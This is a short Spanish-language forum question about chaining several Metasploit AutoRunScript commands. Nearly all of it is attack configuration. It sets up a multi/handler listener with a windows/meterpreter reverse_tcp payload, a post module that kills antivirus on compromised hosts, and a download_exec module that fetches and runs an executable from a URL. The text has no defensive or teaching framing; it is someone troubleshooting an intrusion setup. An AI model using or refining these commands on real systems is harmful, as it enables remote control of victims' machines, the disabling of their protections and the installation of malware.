set AutoRunScript "post/windows/manage/killav","post/windows/manage/download_exec EXECUTE=true OUTPUT=false URL=http://google.com/so.exe"
no funciona
¿Cómo iniciar los comandos múltiples de AutoRunScript en una sesión de metasploit?
Con una instrucción funciona
use exploit/multi/handler
set ExitOnSession false
set PAYLOAD windows/meterpreter/reverse_tcp
set EXITFUNC thread
set LHOST localhost
set LPORT 4445
set AutoRunScript post/windows/manage/killav
exploit -j